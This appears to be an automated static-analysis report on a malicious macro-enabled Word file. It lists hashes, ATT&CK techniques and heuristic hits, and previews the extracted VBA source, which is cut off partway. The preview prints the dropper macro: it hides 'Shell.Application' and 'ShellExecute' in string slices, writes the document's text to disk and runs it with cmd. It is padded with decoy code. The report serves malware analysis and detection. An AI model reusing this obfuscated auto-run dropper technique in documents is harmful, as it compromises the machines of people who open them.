Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 33fd310d0e9f17d7…

MALICIOUS

Office (OOXML)

116.4 KB Created: 2019-07-29 05:47:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2020-07-24
MD5: 8782798ce3fbf896f0a4d1159f97978c SHA-1: c9fb001ee8410cf44a526b583982389b75fb6942 SHA-256: 33fd310d0e9f17d72ae9c4b97174e21b2bc31b730f566a55ddc7816d8b83c586
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OOXML document containing a Document_Open VBA macro. This macro uses CreateObject and CallByName to execute a command. The reconstructed command is 'cmd /cw /c "C:\Users\Public\document.doc"', which suggests an attempt to run a malicious payload. The macro also appears to interact with Outlook, potentially for further distribution or information gathering.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5516 bytes
SHA-256: 308ef69e66be28c72d1c3add2bcc226230a9c2fea48aed05526d3bf98e1f9073
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Kolers As String
Public Bopers As String
Public Ferasz As String
Public Bpersa As String
Private Veropler As String
Private Zipers As String
Private Reversa As String
Private Handelpo As String

Private Sub SaintPaint()
 Enum_All_Records
 CallByName CreateObject(Handelpo & "." & Reversa), Handelpo & Bpersa, VbMethod, Bopers & Handelpo, "c" & "md /cw" & Kolers & " " & "/" & Ferasz & Kolers & " " & Chr(92) & Chr(34) & Zipers & Chr(92) & Chr(34), Empty, Empty, 0
End Sub
 
Private Sub WayByWay(xer As String)
  Dim Nersado As String, Poresax As Integer
  Nersado = ActiveDocument.FullName + "x" + xer
  Poresax = FreeFile
  Open Nersado For Binary Lock Read Write As #Poresax
  Put #Poresax, , ActiveDocument.Content.Text
  Close #Poresax
  Zipers = Nersado
End Sub

Public Sub SubjectFilter()
  Dim Folder As Outlook.MAPIFolder
  Dim obj As Object
  Dim Mail As Outlook.MailItem
  Dim View As Outlook.View
  Dim Find As String, DASL As String
  Dim Filter As String
  Dim ViewName As String
  Dim Created As Boolean
  
  'Name of your custom view
  ViewName = "My-View"
  
  Set obj = Application.ActiveExplorer.Selection(1)
  
  If Not TypeOf obj Is Outlook.MailItem Then
    'this sample is for emails
    Exit Sub
  End If
  
  Set Mail = obj
  Set Folder = Mail.Parent
  
  '[Property] = [Value]
  Filter = "#0 = '#1'"
  
  'DASL-Name of the property we want to search
  DASL = "/0x0037001F"
  
  'Value to search for
  Find = Mail.Subject
  
  'Find or create the view
  Set View = Folder.CurrentView
  If LCase$(View.Name) <> LCase$(ViewName) Then
    Set View = Folder.Views(ViewName)
    If View Is Nothing Then
      Set View = Folder.Views.Add(ViewName, olTableView, olViewSaveOptionAllFoldersOfType)
      Created = True
    End If
  End If
  
  'Apply filter
  DASL = Chr(34) & DASL & Chr(34)
  Filter = Replace(Filter, "#0", DASL)
  Filter = "(" & Filter & ")"
  Filter = Replace(Filter, "#1", Find)
  
  View.Filter = Filter
  View.Apply
  If Created Then View.Save
End Sub

Function SQL_in_comments()
On Error Resume Next
    SQL_in_comments = Replace(Replace(Application.VBE.ActiveCodePane.CodeModule.Lines(2, 3), "'   ", ""), "'", "")
End Function

Public Sub Enum_All_Records()
Dim Car As CarClass
Dim str As String, s As Variant
Dim largeString As String

Set Car = New CarClass

str = "Hello there John!"

largeString = "This is a long block of text that I want to fill " & _
              "into a form field. I need to make sure I pay attention " & _
              "to spacing and carriage return issues while doing so. " & _
              "I also have to use quotes liberally, the concatenation " & _
              "operator, and the continuance underscore to make sure " & _
              "VBA can parse my code." & vbCr & vbCr & _
              "It's kind of a pain in the ass and I wish I could use " & _
              "a heredoc instead, letting me copy and paste the block" & _
              "of text I need from another source and shove it into " & _
              "a string."
              
              SQL_in_comments
Reversa = Mid("fex the appli" & "cation", 9, 11)
 
'Get first 5 characters from the Left
Debug.Print Left(Reversa, 5) 'Result: "Hello"

Handelpo = Mid("Sem a probe sh" & "ell", 13, 5)
 
'Get first 5 characters from the Right
Debug.Print Right(Handelpo, 5) 'Result: "John!"

Bopers = Mid("Machine Po" & "wer off", 9, 5)
 
'Get 5 characters starting at the 7th character
Debug.Print Mid(Bopers, 7, 5) 'Result: "there"
 
'Split the sentence into words separated by a SPACE and print them
For Each s In Split(str, " ")
   Debug.Print s
Next
Car.TestCarClass


Kolers = Mid("InDA Scr" & "ipt", 6, 6)
Ferasz = Mid("DERETE:JIMM", 6, 
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 46592 bytes
SHA-256: 3dd09bc52bdb29f03745c77517b0c47d0efea80c53bf5fa76bc1074a060f051e

Open this report in the interactive analyzer, or submit your own file for analysis.